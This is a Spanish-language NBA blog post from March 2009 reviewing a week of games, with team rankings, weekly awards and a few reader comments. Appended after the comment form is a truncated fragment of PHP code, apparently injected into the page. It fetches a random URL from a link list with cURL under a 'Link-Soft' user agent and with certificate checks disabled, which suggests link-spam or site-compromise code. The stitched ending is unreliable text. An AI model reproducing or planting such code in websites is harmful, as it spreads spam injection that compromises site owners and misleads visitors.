Informe Semanal (Semana 18)

02 de March de 2009 por txusma

El domingo no pudisteis desayunar con la crónica de los partidos del sábado y por tanto lo primero que debemos hacer es disculparnos por semejante descuído. En todo caso no os preocupéis que tampoco pasó nada interesante. Total, Dwyane Wade se quedó a un paso de los 50 puntos y el triple doble en el Madison de donde fue despedido a gritos de: “MVP! MVP!”… Minucias.

Pero ahora es momento de Informe Semanal y lo primero que hay que destacar es la increíble y emocionante lucha que se está llevando a cabo para clasificarse para los Playoffs de ambas conferencias. En el Oeste parece que todos se han puesto las pilas a la vez y en el Este todos los implicados dan 1 paso para adelante y otro para atrás así que la igualdad continúa asegurada.

ON FIRE

Los 2 mejores equipos de la semana son del Oeste y los 2 están inmersos en la cruenta lucha que dará acceso a los Playoffs. Tras recuperar a Tyson Chandler los New Orleans Hornets vuelven a carburar con un Paul que mantiene su nivel y un West que ha dado un paso al frente justo cuando era más necesario. Por su parte los Utah Jazz, con el equipo al completo por primera vez durante la temporada cierran también la semana de manera immaculada. 4 victorias.

A BUEN RITMO

Si Hornets y Jazz son los equipos más en forma ahora mismo sus rivales en el Oeste no se quedan atrás. Unos parece que sin sus figuras juegan más cómodos como los Rockets de T-Mac o los Suns de Stoudamire y otros, como los Mavericks, parecen ir encajando las piezas poco a poco. De momento los Suns siguen fuera de Playoffs pero yo ya no pongo la mano en el fuego por nadie.

En el Este, Nets y Bobcats recortan diferencias con los Bucks, que son ahora mismo los que se encuentran en la octava posición, Miami continúa acercándose a la 4ª plaza de los Hawks y Cleveland se coloca de nuevo como mejor equipo de la conferencia.

AL TRAN-TRAN

Mal de alturas en las partes altas de las clasificaciones con Celtics, Magic, Nuggets, Spurs y Lakers perdiendo 2 de sus 4 partidos de la semana. En el caso de verdes y amarillos las bajas juegan, sin duda, un papel muy importante a estas alturas de la temporada. Los Blazers también han acabado en tablas de la semana pero más les vale que no se despisten  viendo el nivel del resto de equipos. Sorprende los de los Clippers, capaces de ganar a los Celtics y perder contra los Kings. Con Randolph en plena forma parece que se pueden convertir en los jueces de las luchas de la liga.

Finalmente los Pistons se han visto abocados a la lucha por los Playoffs del Este tras perder 7 partidos seguidos. Ha tenido que faltar Iverson para poder ganar alguna cosa, concretamente 2 partidos contra los grandes de la conferencia que les permiten coger aire y diseñar una nueva estrategia de juego.  En la misma lucha se encuentran Philadelphia, Chicago y Indiana. Los primeros navegan en aguas más tranquilas sin quitar la vista del retrovisor y los segundos parecen favoritos para ganar la batalla en cuanto acaben de ajustar las piezas recientemente adquiridas.

AL BORDE DEL ABISMO

Milwaukke sigue defendiendo con uñas y dientes su posición pero a largo plazo es de esperar que sean superados por algunos de los equipos que vienen por detrás (llámense Bulls, llámense Nets). Por su parte, los Hawks pueden permitirse un respiro pero para los Knicks las oportunidades se acaban y corren el riesgo de descolgarse definitivamente de la pelea. Una pelea a la que parece que ya no juegan los Raptors. El fichaje de Marion no ha servido para nada y la cosa huele más a reconstrucción que a último esfuerzo. Los Wizards también ganaron un solo encuentro.

En el Oeste Thunder y Kings se dan una alegría ganando un partido. De todas manera las sensaciones difieren bastante entre los 2 equipos.

EL POZO

La conferencia Oeste será más potente que la Este (afirmación que puede ser discutible), pero lo que no tiene discusión posible es la afirmación que los peores equipos de la liga juegan en el Oeste. Grizzlies, Warriors y Wolves cierran la semana en blanco. Unos (Warriors y Wolves) pueden intentar consolarse pensando en sus ausencias. Los Grizzlies no disponen ni de ese pañuelo.

PREMIOS SEMANALES

MVP: El resurgir de Shaquille O’Neal, el paso adelante de Tony Parker ante las bajas de Duncan y Ginobili, la orgía anotadora de Devin Harris o Kobe Bryant, la enésima muestra de calidad de Zach Randolp a los descreídos… Cualquiera de estos jugadores sería merecedor del MVP de la semana pero finalmente se lo vamos a otorgar a un jugador que ha escuchado estos gritos desde la grada. 32.7 puntos, 12 asistencias, 5.7 rebotes, 2.3 robos, 1 tapon, un 54% de acierto en tiros de campo engalanan la increíble semana de Dwyane Wade.

Rookie: En Oklahoma se frotan las manos cada vez que comprueban como responde su rookie. Rusell Westbrook se ha erigido en líder de su franquicia en ausencia de Kevin Durant y ha elevado sus números a 24 puntos, 4.7 rebotes y 4.7 asistencias durante la semana.

Sorpresa:Ver a Ron Artest cogiendo el mando de las operaciones en Houston ahora que no está T-Mac sorprende y mucho. Pero que además comprobemos que no le va nada mal al equipo de Texas nos deja patidifusos. También destaca la semana de “Kriptonita” Robinson. Su juego no enamorará a todos por igual pero habrá que tener en cuenta los 29 puntos, 5.3 rebotes y 3.7 asistencias que se ha cascado estos 7 días.

Decepción: Alguna cosa te has de replantear si tu equipo encadena 8 derrotas consecutivas pero aún deberías reflexionar más si en los 2 partidos que tu no estás este mismo equipo le gana a Orlando y a Boston, 2 de los cocos de tu conferencia. Se nos acaba la magia de Allen Iverson.

La pregunta de la semana: No preguntamos quién se clasificará para los Playoffs de las 2 conferencias sino cuando. ¿Puede ser que 3 o 4 equipos por conferencia se jueguen los playoffs en los 3 últimos partidos?

Comenta

4 comentarios a esta entrada

  1. kantonyo dice:
    #1

    La verdad que viendo el calendario de Toronto, bastante favorable, es una pena que no estén un pelín más arriba y que su juego no sea tan malo. Aún viendo la mala temporada que están teniendo, hubieran tenido oportunidad de clasificarse …

      Citar

  2. Dantley dice:
    #2

    Creo que sí, que al final habrá lucha en los últimos partidos. Aunque cada año los grandes se relajan más en ese tramo final, son los problemas de este sistema, pero bueno, habrá quien esté en la pelea.

    Ojito como dices con Utah por fin al completo. Pueden llegar a ser hasta candidatos.

      Citar

  3. xapa_croack dice:
    #3

    Segun me comentan las canastas del madison son mas grandes de lo reglamentario…. supongo que para favorecer el espectaculo.

      Citar

  4. xapa_croack dice:
    #4

    Hasta yo podria meter un triple ¬¬

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>